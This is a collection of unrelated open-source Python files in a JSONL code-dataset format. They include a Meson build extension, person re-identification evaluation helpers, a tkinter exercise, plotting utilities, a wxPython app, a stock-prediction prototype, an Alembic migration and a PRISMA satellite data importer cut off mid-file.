\"\"\"\n An extension to be built using the Meson build system.\n This class assumes that a `meson.build` file resides in\n the root directory of the Python package sources.\n \"\"\"\n def __init__(self, name, builddir='builddir', compiledname=None):\n self.name = name\n self.builddir = builddir\n self.sourcepath = Path().resolve()\n if compiledname is None:\n self.compiledname = name.split('.')[-1]\n else:\n self.compiledname = compiledname\n super().__init__(name, [])\n","repo_name":"mjziebarth/Mebuex","sub_path":"mebuex/extension.py","file_name":"extension.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38092066396","text":"from ReIDModules.CAL.tools.eval_metrics import evaluate, evaluate_with_clothes\n# from Scripts.inference import args\n\n\ndef evalute_wrapper(dataset, distmat, q_pids, g_pids, q_camids, g_camids, q_clothes_ids, g_clothes_ids, extra_msg):\n print(\"Computing CMC and mAP \", extra_msg)\n cmc, mAP = evaluate(distmat, q_pids, g_pids, q_camids, g_camids)\n print(\"Results ---------------------------------------------------\")\n print('top1:{:.1%} top5:{:.1%} top10:{:.1%} top20:{:.1%} mAP:{:.1%}'.format(cmc[0], cmc[4], cmc[9], cmc[19], mAP))\n print(\"-----------------------------------------------------------\")\n if dataset in ['ltcc', 'ccvid', 'vcclothes']:\n print('Evaluating clothes changing with mode:SC')\n print(\"Results ---------------------------------------------------\")\n cmc, mAP = evaluate_with_clothes(distmat, q_pids, g_pids, q_camids, g_camids, q_clothes_ids, g_clothes_ids,\n mode='SC')\n print(\n 'top1:{:.1%} top5:{:.1%} top10:{:.1%} top20:{:.1%} mAP:{:.1%}'.format(cmc[0], cmc[4], cmc[9], cmc[19], mAP))\n print(\"-----------------------------------------------------------\")\n\n print('Evaluating clothes changing with mode:CC')\n print(\"Results ---------------------------------------------------\")\n cmc, mAP = evaluate_with_clothes(distmat, q_pids, g_pids, q_camids, g_camids, q_clothes_ids, g_clothes_ids,\n mode='CC')\n print(\n 'top1:{:.1%} top5:{:.1%} top10:{:.1%} top20:{:.1%} mAP:{:.1%}'.format(cmc[0], cmc[4], cmc[9], cmc[19], mAP))\n print(\"-----------------------------------------------------------\")\n\n\ndef evaluate_performance_ccvid(tracks_results, alpha):\n correct_predictions = 0\n incorrect_predictions = 0\n for track_prediction in tracks_results:\n track_final_scores = track_prediction.get('final_scores')\n track_true_id = track_prediction.get('track_id').split('_')[1]\n predicted_id = max(track_final_scores, key=track_final_scores.get)\n if int(track_true_id) == predicted_id:\n correct_predictions += 1\n else:\n incorrect_predictions += 1\n\n print(f'Running with alpha: {alpha}\\n'\n f'Predicted correctly: {correct_predictions}\\n'\n f'Predicted incorrectly: {incorrect_predictions}\\n'\n f'Accuracy: {correct_predictions / (correct_predictions + incorrect_predictions)}\\n')\n","repo_name":"bar371/ReFace","sub_path":"evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":2467,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"52"} +{"seq_id":"6151409991","text":"def get_sum(number_list: list[int], k: int) -> str:\n k_list = to_list_form(k)\n number_list = number_list[::-1]\n\n max_len = max(len(number_list), len(k_list))\n shift = 0\n result = []\n for i in range(max_len):\n first_number = number_list[i] if i < len(number_list) else 0\n second_number = k_list[i] if i < len(k_list) else 0\n temp = first_number + second_number + shift\n shift = temp // 10\n result.append(temp % 10)\n\n if shift > 0:\n result.append(1)\n\n return \" \".join(str(elem).strip() for elem in result[::-1])\n\n\ndef to_list_form(number: int) -> list:\n arr = []\n while number != 0:\n remainder = number % 10\n arr.append(remainder)\n number = number // 10\n\n return arr\n\n\ndef read_input() -> tuple[list[int], int]:\n n = int(input())\n number_list = list(map(int, input().strip().split()))\n k = int(input())\n return number_list, k\n\n\nnumber_list, k = read_input()\nprint(\" \".join(map(str, get_sum(number_list, k))))\n","repo_name":"RamazanPython/algs","sub_path":"sprint_1/homework/task_k/task_k.py","file_name":"task_k.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13270446393","text":"from tkinter import *\nwindow = Tk()\nwindow.title(\"2021-2학기 SW프로그래밍입문 메인과제2-1\")\nw = Canvas(window, width=500, height=500)\nw.pack()\nleft = 50\ntop = 50\nright = 100\nbottom = 100\n\n\nw.create_rectangle(left, top, right, bottom, fill=\"yellow\")\n\ndef movRight():\n w.delete(ALL)\n global left\n global top\n global right\n global bottom\n \n left = left + 5\n right = right + 5\n\n w.create_rectangle(left, top, right, bottom, fill=\"yellow\")\n \ndef movLeft():\n w.delete(ALL)\n global left\n global top\n global right\n global bottom\n \n left = left - 5\n right = right - 5\n \n w.create_rectangle(left, top, right, bottom, fill=\"yellow\")\n \ndef movTop():\n w.delete(ALL)\n global left\n global top\n global right\n global bottom\n \n top = top - 5\n bottom = bottom - 5\n\n w.create_rectangle(left, top, right, bottom, fill=\"yellow\")\n \ndef movBottom():\n w.delete(ALL)\n global left\n global top\n global right\n global bottom\n \n top = top + 5\n bottom = bottom + 5\n\n w.create_rectangle(left, top, right, bottom, fill=\"yellow\")\n \nButton(window, text=\"<==(좌)\", bg=\"red\",fg=\"black\",\n command=movLeft).pack(side=LEFT)\nButton(window, text=\"==>(우)\", bg=\"green\", fg=\"black\",\n command=movRight).pack(side=LEFT)\nButton(window, text=\"^(상)\", bg=\"orange\", fg=\"black\",\n command=movTop).pack(side=LEFT)\nButton(window, text=\"v(하)\", bg=\"orange\", fg=\"black\",\n command=movBottom).pack(side=LEFT)\n\n\nwindow.mainloop()\n","repo_name":"youyoung00/tkinter_create_rectangle_move","sub_path":"유신환_문제1-결과.py","file_name":"유신환_문제1-결과.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12488065269","text":"\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport numpy as np\nimport pandas as pd\n\ndef BarhPlot(latent_vector, full_savepath):\n \"\"\"Plot horizontal bars for absolute values of each latent vector components\"\"\"\n plt.figure(figsize=(10,20))\n plt.barh(range(latent_vector.shape[0]), latent_vector)\n plt.xlabel(\"Value\", fontsize=16)\n plt.ylabel(\"Component number\", fontsize=16)\n # plt.title(\"Latent vector components values\")\n plt.ylim(0, latent_vector.shape[0])\n plt.xticks(fontsize=16)\n plt.savefig(full_savepath, bbox_inches='tight')\n plt.close()\n\ndef CountPlot(latent_vector, savepath, eps=1e-2):\n \"\"\"Plot histogram of zero/non-zero elements for latent vector\"\"\"\n binary_vector = np.array([\"Non-zero\" if abs(value) > eps else \"Close to zero\" for value in latent_vector])\n binary_df = pd.DataFrame(columns=[\"zero_prox\"], data=binary_vector)\n ax = sns.countplot(x=\"zero_prox\", data=binary_df)\n ax.set(xlabel=\"latent vector components values\")\n ax.figure.savefig(savepath)\n plt.close(ax.figure)","repo_name":"VyatkinAlexey/Noiseless","sub_path":"visualization_utils.py","file_name":"visualization_utils.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"69845090724","text":"__author__ = 'dgraziotin'\n\"\"\"\nMain Application. Implements a custom stdout/stderr listener.\nClass the Main GUI.\nCoding standard: http://www.wxpython.org/codeguidelines.php\n\"\"\"\nimport sys\nimport wx\nimport wx.xrc\nimport pkg_resources\n\nimport datadeck.gui\nclass DataDeck(wx.App):\n def __init__(self, redirect=True, filename=None):\n wx.App.__init__(self, redirect, filename)\n\n def OnInit(self, ):\n if self.IsDpmInstalled():\n import datadeck.gui.main\n self.MainGUI = datadeck.gui.main.MainGUI()\n else:\n import datadeck.gui.base\n frame = datadeck.gui.base.DepCheckFrame(None)\n dependencies_file = pkg_resources.resource_filename('datadeck.res', 'MISSING_DPM.txt')\n frame.m_dependencies_tc.AppendText(open(dependencies_file).read())\n frame.SetSize(wx.Size(600,400))\n frame.Show()\n return True\n \n def IsDpmInstalled(self):\n try:\n import dpm\n return True\n except ImportError:\n return False\n\n\nclass SysOutListener:\n \n def __init__(self, wx_widget):\n self.m_wxwidget = wx_widget\n \n def write(self, string):\n sys.__stdout__.write(string)\n evt = datadeck.gui.main.WX_STDOUT(text=string)\n wx.PostEvent(self.m_wxwidget, evt)\n\n def flush(self):\n sys.__stdout__.flush()\n\ndef run_as_plugin():\n MainGUI = datadeck.gui.main.MainGUI()\n sysout_listener = SysOutListener(MainGUI.m_console_tc)\n sys.stdout = sysout_listener\n \ndef run():\n app = DataDeck(0)\n app.SetAppName(\"DataDeck\")\n if app.IsDpmInstalled():\n sysout_listener = SysOutListener(wx.GetApp().MainGUI.m_console_tc)\n sys.stdout = sysout_listener\n app.MainLoop()\n\nif __name__ == '__main__':\n run()\n\n","repo_name":"dgraziotin/datadeck","sub_path":"datadeck/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"5475055215","text":"\nimport sys\nfrom datetime import timedelta\nfrom datetime import datetime\n\nfrom dateutil.relativedelta import relativedelta\nfrom iexfinance import Stock\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nfrom collections import deque\nimport numpy as np\nfrom numpy.lib.stride_tricks import as_strided\nimport pandas as pd\nfrom pandas.tseries.offsets import BDay\nimport pandas_datareader as pdr\n\nfrom kftools.optimizations import PortfolioOptimizer\n\n\ndef read_stock_data(symbols, start_date, end_date, provider='yahoo'):\n stocks = {}\n if not isinstance(symbols, (list, tuple,)):\n symbols = [symbols]\n if isinstance(start_date, str):\n start_date = pd.to_datetime(start_date)\n end_date = pd.to_datetime(end_date)\n for symbol in symbols:\n stocks[symbol] = pdr.DataReader(symbol, provider,\n start_date, end_date)\n stocks[symbol].drop(['Close'], axis=1, inplace=True)\n stocks[symbol].rename(str.lower, axis='columns', inplace=True)\n stocks[symbol].rename(columns={'adj close': 'close'}, inplace=True)\n stocks[symbol].index.rename('date', inplace=True)\n return stocks\n\ndef rolling_window(array, length):\n orig_shape = array.shape\n if not orig_shape:\n raise IndexError(\"Can't restride a scalar.\")\n elif orig_shape[0] <= length:\n raise IndexError(\n \"Can't restride array of shape {shape} with\"\n \" a window length of {len}\".format(\n shape=orig_shape,\n len=length,\n )\n )\n\n num_windows = (orig_shape[0] - length + 1)\n new_shape = (num_windows, length) + orig_shape[1:]\n\n new_strides = (array.strides[0],) + array.strides\n\n return as_strided(array, new_shape, new_strides)\n\n\nclass Factor(object):\n\n def __init__(self, data, window_length=15, inputs='close', preserve_data=False):\n \"\"\"\n window_length :\n Length of the lookback window over which to compute factor.\n \"\"\"\n if preserve_data:\n self.data = data\n else:\n self.data = data[inputs].sort_index(ascending=True).tail(window_length)\n\n @classmethod\n def exponential_weights(cls, length, decay_rate):\n x = np.full(length, decay_rate, np.dtype('float64')) ** np.arange(length + 1, 1, -1)\n return x\n\n\nclass Returns(Factor):\n \"\"\"\n Calculates the percent change in close price over the given window_length\n \"\"\"\n def compute(self):\n out = (self.data[-1] - self.data[0]) / self.data[0]\n return out\n\n\nclass RSI(Factor):\n \"\"\"\n Relative Strength Index\n \"\"\"\n def compute(self):\n diffs = np.diff(self.data, axis=0)\n ups = np.nanmean(np.clip(diffs, 0, np.inf), axis=0)\n downs = np.abs(np.nanmean(np.clip(diffs, -np.inf, 0), axis=0))\n return 100 - (100 / (1 + (ups / downs)))\n\n\nclass MA(Factor):\n \"\"\"\n Moving Average\n \"\"\"\n def compute(self, window=10):\n return np.nanmean(self.data.rolling(window=window).mean())\n\n\nclass EWMA(Factor):\n \"\"\"\n Exponential Weighted Moving Average\n \"\"\"\n def compute(self, span=30):\n return np.nanmean(self.data.ewm(span=span).mean())\n\n\nclass BollingerBands(Factor):\n \"\"\"\n Bollinger Bands technical indicator.\n k : float\n The number of standard deviations to add or subtract to create the\n upper and lower bands.\n \"\"\"\n\n def compute(self, k=2):\n out = {}\n difference = k * np.nanstd(self.data, axis=0)\n out['middle'] = middle = np.nanmean(self.data, axis=0)\n out['upper']= middle + difference\n out['lower'] = middle - difference\n return out\n\n\nclass MACD(Factor):\n \"\"\"\n Moving Average Convergence/Divergence (MACD) Signal line\n \"\"\"\n def __init__(self, data, fast_period=12, slow_period=26, signal_period=9, inputs='close'):\n if slow_period <= fast_period:\n raise ValueError(\"'slow_period' must be greater than 'fast_period'\")\n self.fast_period = fast_period\n self.slow_period = slow_period\n self.signal_period = signal_period\n window_length = slow_period + signal_period - 1\n self.data = data[inputs].sort_index(ascending=True).tail(window_length)\n\n def _ewma(self, data, length, axis=1):\n decay_rate = 1.0 - (2.0 / (1.0 + length))\n return np.average(\n data,\n axis=axis,\n weights=Factor.exponential_weights(length, decay_rate)\n )\n\n def compute(self):\n slow_EWMA = self._ewma(\n rolling_window(self.data, self.slow_period),\n self.slow_period\n )\n fast_EWMA = self._ewma(\n rolling_window(self.data, self.fast_period)[-self.signal_period:],\n self.fast_period\n )\n macd = fast_EWMA - slow_EWMA\n return self._ewma(macd.T, self.signal_period, axis=0)\n\n\nclass Context(object):\n\n def __init__(self, portfolio=[], benchmark_symbol='SPY'):\n self.portfolio = portfolio if isinstance(portfolio, (list, tuple)) else [portfolio]\n self.technical_indicator_states = {}\n self.window_length = 7 # Number of data points to collect before updating train collections\n self.benchmark = deque(maxlen=self.window_length)\n self.benchmark_symbol = benchmark_symbol\n self.features = ['RSI','EMA','MACD','SMA_5','SMA_10','bb_lower','bb_middle','bb_upper']\n self.response = ['Class']\n self.X = pd.DataFrame(columns=self.features) # X train data\n self.Y = pd.DataFrame(columns=self.response) # Y train data\n self.prediction = {} # Stores most recent prediction\n self.day_counter = 0\n self.position_adjustment_days = 5 # Number of days to wait before adjusting positions\n self.min_data_points = 500\n self.max_data_points = 1500\n self.total_buy = 0\n self.positions = []\n self.data = {}\n self.benchmark_data = {}\n self.output = None\n self.today = pd.to_datetime((pd.datetime.today() - BDay(1)).strftime('%Y-%m-%d'))\n self.classifier = DecisionTreeClassifier(max_depth=5, max_leaf_nodes=10)\n\n def _add_data_for_symbol(self, symbol, container, range, provider):\n if provider == 'iex':\n data = Stock(symbol).get_chart(range='{}y'.format(range))\n if not data:\n raise RuntimeError('Unable to get data from IEX for symbol {} and {} range'.format(symbol, range))\n container[symbol] = pd.DataFrame.from_dict(data)\n container[symbol]['date'] = pd.to_datetime(container[symbol]['date'])\n container[symbol].reset_index(drop=True, inplace=True)\n container[symbol] = container[symbol].set_index('date')\n else:\n start_date = (datetime.today() - relativedelta(years=range)).strftime('%Y-%m-%d')\n end_date = datetime.today().strftime('%Y-%m-%d')\n stocks = read_stock_data(symbol, start_date, end_date, provider=provider)\n container[symbol] = stocks[symbol]\n\n def _load_portfolio_data(self, provider='iex', range=5):\n for symbol in self.portfolio:\n self._add_data_for_symbol(symbol, self.data, range, provider)\n self._add_data_for_symbol(self.benchmark_symbol, self.benchmark_data, range, provider)\n\n @property\n def _adjust_position(self):\n return True if self.day_counter % self.position_adjustment_days == 0 else False\n\n def _increment_current_day(self, end_date):\n end = end_date.strftime('%Y-%m-%d')\n\n try:\n iloc = self.benchmark_data[self.benchmark_symbol].index.get_loc(end)\n except KeyError:\n return False\n\n stop = self.benchmark_data[self.benchmark_symbol].index[iloc]\n prev = stop if iloc == 0 else self.benchmark_data[self.benchmark_symbol].index[iloc - 1]\n next = stop if iloc == self.benchmark_data[self.benchmark_symbol].index.size - 1 else \\\n self.benchmark_data[self.benchmark_symbol].index[iloc + 1]\n\n self.today = stop\n self.day_counter += 1\n\n return True\n\n def _add_to_portfolio(self, prediction_array):\n # Note: We should be able to run prediction_array > 0 condition\n return True if prediction_array.size == 1 and prediction_array[0] else False\n\n def _get_current_price_for_symbol(self, symbol, column='open'):\n # TODO: This fn needs to get 1h data\n if symbol in self.data:\n return self.data[symbol].loc[self.today][column]\n if symbol in self.benchmark_data:\n return self.benchmark_data[symbol].loc[self.today][column]\n return None\n\n def _get_history(self, symbols=None, column='close', days=30, frequency='1d'):\n data = pd.DataFrame()\n end = self.today.strftime('%Y-%m-%d')\n symbols = symbols if isinstance(symbols, (list, tuple)) else [symbols]\n for symbol in symbols:\n if symbol in self.data:\n iloc = self.data[symbol].index.get_loc(end)\n start = self.data[symbol].index[iloc - days].strftime('%Y-%m-%d')\n data[symbol] = self.data[symbol][start:end][column]\n return data\n\n def _load_state(self, start_date, end_date):\n data = []\n index = ['Name']\n returns = ['returns_5']\n\n start = start_date.strftime('%Y-%m-%d')\n end = end_date.strftime('%Y-%m-%d')\n\n for key, value in self.data.items():\n features = {key: 0.0 if key not in index else '' for key in index + self.features + returns}\n features['Name'] = key\n features['SMA_5'] = MA(value.loc[start:end], window_length=5).compute(window=5)\n features['SMA_10'] = MA(value.loc[start:end], window_length=10).compute(window=10)\n features['EMA'] = EWMA(value.loc[start:end], window_length=30).compute(span=30)\n features['RSI'] = RSI(value.loc[start:end], window_length=15).compute()\n features['MACD'] = MACD(value.loc[start:end]).compute()\n bb = BollingerBands(value.loc[start:end], window_length=20).compute(k=2)\n features['bb_lower'] = bb['lower']\n features['bb_middle'] = bb['middle']\n features['bb_upper'] = bb['upper']\n features['returns_5'] = Returns(value.loc[start:end], window_length=5).compute()\n\n data.append(features)\n\n self.output = pd.DataFrame(data, columns=index + self.features + returns)\n self.output.reset_index(drop=True, inplace=True)\n self.output = self.output.set_index(index[0])\n self.output = self.output.dropna()\n\n def _is_benchamrk_ready(self):\n return True if len(self.benchmark) == self.benchmark.maxlen else False\n\n def _is_symbol_ready(self, symbol):\n return True if len(self.technical_indicator_states[symbol].index) == self.window_length else False\n\n def _rebalance(self):\n for symbol, _ in self.output.iterrows():\n if symbol in self.technical_indicator_states:\n self.technical_indicator_states[symbol] = self.technical_indicator_states[symbol].append(\n self.output.loc[symbol], ignore_index=True)\n else:\n self.technical_indicator_states[symbol] = pd.DataFrame(\n self.output.loc[symbol]).transpose()\n\n self.benchmark.append(self._get_current_price_for_symbol(self.benchmark_symbol, 'open'))\n\n # Wait till we accumulate enough data inside of the benchmark collection\n if self._is_benchamrk_ready():\n\n # Calculate Benchmark return\n # benchmark = (self.benchmark[-1] - self.benchmark[0]) / self.benchmark[0]\n benchmark = Returns(self.benchmark, preserve_data=True).compute()\n symbol_X_tests = {}\n\n for symbol, _ in self.output.iterrows():\n # Make sure there is enough data in for the symbol\n if self._is_symbol_ready(symbol):\n # Take the last return and check if it beat benchmark\n returns_5 = self.technical_indicator_states[symbol].iloc[-1]['returns_5']\n change = returns_5 > benchmark and returns_5 > 0\n\n Y_train = {}\n Y_train['Class'] = change\n\n # Load X train data from the 1st row\n X_train = {}\n for column in self.technical_indicator_states[symbol].columns:\n if column in self.features:\n X_train[column] = self.technical_indicator_states[symbol].iloc[0][column]\n\n self.X = self.X.append([X_train], ignore_index=True)\n self.Y = self.Y.append([Y_train], ignore_index=True)\n\n # Load X test data from the latest row\n symbol_test = {}\n for column in self.technical_indicator_states[symbol].columns:\n if column in self.features:\n symbol_test[column] = self.technical_indicator_states[symbol].iloc[-1][column]\n\n symbol_X_tests[symbol] = symbol_test\n\n # Purge 1st row\n self.technical_indicator_states[symbol] = self.technical_indicator_states[symbol].iloc[1:]\n\n # There needs to be enough data points to make a good model and adjust positions once per 5 days\n if len(self.X.index) >= self.min_data_points and self._adjust_position:\n\n # Purge data if we reach max number of endpoints (do we have to to this?)\n if len(self.X.index) > self.max_data_points:\n self.X = self.X.iloc[self.min_data_points:]\n self.Y = self.Y.iloc[self.min_data_points:]\n\n self.Y[self.response] = self.Y[self.response].astype('bool')\n self.classifier.fit(self.X[self.features].values, self.Y[self.response].values) # Generate the model\n\n self.total_buy = 0\n for symbol, _ in self.output.iterrows():\n if symbol in symbol_X_tests:\n X_test = pd.DataFrame(columns=self.features)\n X_test = X_test.append(symbol_X_tests[symbol], ignore_index=True)\n self.prediction[symbol] = self.classifier.predict(X_test)\n self.total_buy += 1 if self.prediction[symbol][0] else 0\n\n position_symbols = []\n for symbol, _ in self.output.iterrows():\n if symbol in self.prediction:\n if self._add_to_portfolio(self.prediction[symbol]):\n position_symbols.append(symbol)\n else:\n print(\"SELL - order_target_percent(\", symbol, \", 0)\")\n\n if self.total_buy != 0:\n self.positions = self._get_history(position_symbols, 'close', 30, '1d')\n weights1 = PortfolioOptimizer.optimize_weights1(self.positions)\n self.positions = self._get_history(position_symbols, 'close', 100, '1d')\n weights2, _, _ = PortfolioOptimizer.optimize_weights2(self.positions)\n for symbol in weights1.keys():\n print(\"BUY - order_target_percent(\", symbol, weights[symbol], \")\")\n\n\ndef main():\n n = 150\n # from_date = pd.to_datetime('2015-10-01') + BDay(1)\n from_date = pd.to_datetime('2017-11-01') + BDay(1)\n # to_date = pd.to_datetime('2015-12-30') + BDay(1)\n to_date = pd.to_datetime('2018-01-30') + BDay(1)\n # context = Context(portfolio=['AAPL', 'ADSK', 'ADBE', 'ADI', 'AMAT', 'AMD', 'APH', 'ARW', 'AVT', 'MSFT', 'INTC', 'AMZN', 'GOOG'])\n context = Context(portfolio=['IBM', 'SBUX', 'XOM', 'AAPL', 'MSFT', 'TLT', 'SHY', 'CVS', 'AMZN', 'GOOG', 'AMD'])\n context._load_portfolio_data(provider='yahoo')\n for i in range(n):\n if context._increment_current_day(to_date):\n context._load_state(from_date, to_date)\n context._rebalance()\n to_date = pd.to_datetime(to_date.to_pydatetime() + BDay(1))\n from_date = pd.to_datetime(from_date.to_pydatetime() + BDay(1))\n print(\"Processing dates from\", from_date, \"to\", to_date)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"kafana/thinkering","sub_path":"trading/kftools/concepts/ml2.py","file_name":"ml2.py","file_ext":"py","file_size_in_byte":16350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70023159845","text":"\"\"\"listdb table\n\nRevision ID: 6bd3e2ecaf38\nRevises: d8e4913bf112\nCreate Date: 2018-11-01 21:31:33.333132\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '6bd3e2ecaf38'\ndown_revision = 'd8e4913bf112'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('listdb',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.Column('list_name', sa.String(length=100), nullable=True),\n sa.Column('file_name', sa.String(length=300), nullable=True),\n sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('listdb')\n # ### end Alembic commands ###\n","repo_name":"cgutwein/grocery-and-meal-assistant","sub_path":"flask/migrations/versions/6bd3e2ecaf38_listdb_table.py","file_name":"6bd3e2ecaf38_listdb_table.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37880282696","text":"from os.path import basename\r\nfrom typing import Dict, Any, List, Tuple, Optional\r\n\r\nimport numpy as np\r\nfrom osgeo import gdal\r\n\r\nfrom enmapbox.typeguard import typechecked\r\nfrom enmapboxprocessing.algorithm.createspectralindicesalgorithm import CreateSpectralIndicesAlgorithm\r\nfrom enmapboxprocessing.algorithm.importprismal1algorithm import utilsReadAsArray, utilsDeleteCopy\r\nfrom enmapboxprocessing.driver import Driver\r\nfrom enmapboxprocessing.enmapalgorithm import EnMAPProcessingAlgorithm, Group\r\nfrom enmapboxprocessing.rasterreader import RasterReader\r\nfrom enmapboxprocessing.rasterwriter import RasterWriter\r\nfrom enmapboxprocessing.utils import Utils\r\nfrom qgis.core import QgsProcessingContext, QgsProcessingFeedback, QgsProcessingException, QgsRectangle, \\\r\n QgsCoordinateReferenceSystem, QgsRasterLayer, QgsMapLayer\r\n\r\n\r\n@typechecked\r\nclass ImportPrismaL2DAlgorithm(EnMAPProcessingAlgorithm):\r\n P_FILE, _FILE = 'file', 'File'\r\n P_SPECTRAL_REGION, _SPECTRAL_REGION = 'spectralRegion', 'Spectral region'\r\n O_SPECTRAL_REGION = ['VNIR/SWIR combined', 'VNIR only', 'SWIR only', ]\r\n VnirSwirRegion, VnirRegion, SwirRegion, = range(3)\r\n P_BAD_BAND_THRESHOLD, _BAD_BAND_THRESHOLD = 'badBandThreshold', 'Bad band threshold'\r\n P_BAD_PIXEL_TYPE, _BAD_PIXEL_TYPE = 'badPixelType', 'Select bad pixel'\r\n O_BAD_PIXEL_TYPE = ['Invalid pixel from L1 product', 'Negative value after atmospheric correction',\r\n 'Saturated value after atmospheric correction']\r\n InvalidL1Pixel, NegativeAtmosphericCorrectionPixel, SaturatedAtmosphericCorrectionPixel = range(3)\r\n P_OUTPUT_SPECTRAL_CUBE, _OUTPUT_SPECTRAL_CUBE = 'outputPrismaL2D_spectralCube', 'Output VNIR/SWIR Cube raster layer'\r\n P_OUTPUT_PAN_CUBE, _OUTPUT_PAN_CUBE = 'outputPrismaL2D_panCube', 'Output PAN raster layer'\r\n\r\n P_OUTPUT_SPECTRAL_GEOLOCATION, _OUTPUT_SPECTRAL_GEOLOCATION = 'outputPrismaL2D_spectralGeolocationFields', \\\r\n 'Output VNIR/SWIR Geolocation Fields raster layer'\r\n P_OUTPUT_SPECTRAL_GEOMETRIC, _OUTPUT_SPECTRAL_GEOMETRIC = 'outputPrismaL2D_spectralGeometricFields', \\\r\n 'Output VNIR/SWIR Geometric Fields raster layer'\r\n P_OUTPUT_SPECTRAL_ERROR, _OUTPUT_SPECTRAL_ERROR = 'outputPrismaL2D_spectralErrorMatrix', \\\r\n 'Output VNIR/SWIR Error Matrix raster layer'\r\n P_OUTPUT_PAN_GEOLOCATION, _OUTPUT_PAN_GEOLOCATION = 'outputPrismaL2D_panGeolocationFields', \\\r\n 'Output PAN Geolocation Fields raster layer'\r\n P_OUTPUT_PAN_ERROR, _OUTPUT_PAN_ERROR = 'outputPrismaL2D_panErrorMatrix', \\\r\n 'Output PAN Error Matrix raster layer'\r\n\r\n def displayName(self):\r\n return 'Import PRISMA L2D product'\r\n\r\n def shortDescription(self):\r\n link = EnMAPProcessingAlgorithm.htmlLink(\r\n 'http://prisma.asi.it/missionselect/docs.php', 'PRISMA Documentation Area'\r\n )\r\n return 'Import PRISMA L2D product from HE5 file to QGIS/GDAL conform GTiff/VRT file format ' \\\r\n 'with proper coordinate reference system.' \\\r\n 'Note that for the spectral cube and error matrix, the interleave is transposed ' \\\r\n 'and stored as GTiff to enable proper visualization in QGIS.' \\\r\n 'All other sub-datasets are stored as light-weight VRT files.\\n' \\\r\n f'For further details visit the {link}.'\r\n\r\n def helpParameters(self) -> List[Tuple[str, str]]:\r\n return [\r\n (self._FILE, 'The HE5 product file.\\n'\r\n 'The main data contained in the PRS_L2d_HCO Swath is the surface spectral reflectance '\r\n 'Coregistersed Hyperspectral Cube (in instrument geometric reference).\\n'\r\n 'The main data contained in the PRS_L2d_PCO Swath is the surface panchromatic reflectance '\r\n 'image (in instrument geometric reference).\\n'\r\n 'Instead of executing this algorithm, '\r\n 'you may drag&drop the HE5 file directly from your system file browser '\r\n 'a) onto the EnMAP-Box map view area, or b) onto the Sensor Product Import panel.'),\r\n (self._SPECTRAL_REGION, 'Spectral region to be imported.'),\r\n (self._BAD_BAND_THRESHOLD, 'If the proportion of erroneous pixels in the VNIR/SWIR Pixel Error Matrix,'\r\n 'exceeds the bad band threshold (a value between 0 and 1), '\r\n 'the band is marked as a bad band.\\n'\r\n 'If specified, Output VNIR/SWIR Error Matrix raster layer needs to be '\r\n 'specified as well.'),\r\n (self._BAD_PIXEL_TYPE, 'Pixels concidered to be erroneous.'),\r\n (self._OUTPUT_SPECTRAL_CUBE, 'VNIR/SWIR Cube GTiff raster file destination. '\r\n 'The surface spectral reflectance Coregistersed Hyperspectral Cube '\r\n '(in instrument geometric reference).'),\r\n (self._OUTPUT_PAN_CUBE, 'PAN VRT raster file destination. '\r\n 'The surface panchromatic reflectance image (in instrument geometric reference).'),\r\n (self._OUTPUT_SPECTRAL_GEOLOCATION, 'VNIR/SWIR Geolocation Fields VRT raster file destination. '\r\n 'Includes Latitude and Longitude bands.'),\r\n (self._OUTPUT_SPECTRAL_GEOMETRIC, 'VNIR/SWIR Geometric Fields VRT raster file destination. '\r\n 'Includes Observing Angle, Relative Azimuth Angle and '\r\n 'Solar Zenith Angle bands.'),\r\n (self._OUTPUT_SPECTRAL_ERROR, 'VNIR/SWIR Pixel Error Matrix GTiff raster file destination.'),\r\n (self._OUTPUT_PAN_GEOLOCATION, 'PAN Geolocation Fields VRT raster file destination. '\r\n 'Includes Latitude and Longitude bands.'),\r\n (self._OUTPUT_PAN_ERROR, 'PAN Pixel Error Matrix VRT raster file destination.'),\r\n ]\r\n\r\n def group(self):\r\n return Group.ImportData.value\r\n\r\n def initAlgorithm(self, configuration: Dict[str, Any] = None):\r\n self.addParameterFile(self.P_FILE, self._FILE, extension='he5')\r\n self.addParameterEnum(self.P_SPECTRAL_REGION, self._SPECTRAL_REGION, self.O_SPECTRAL_REGION, False, 0)\r\n self.addParameterFloat(self.P_BAD_BAND_THRESHOLD, self._BAD_BAND_THRESHOLD, None, True, 0, 1, False)\r\n self.addParameterEnum(self.P_BAD_PIXEL_TYPE, self._BAD_PIXEL_TYPE, self.O_BAD_PIXEL_TYPE, True, [0], True)\r\n self.addParameterRasterDestination(self.P_OUTPUT_SPECTRAL_CUBE, self._OUTPUT_SPECTRAL_CUBE)\r\n 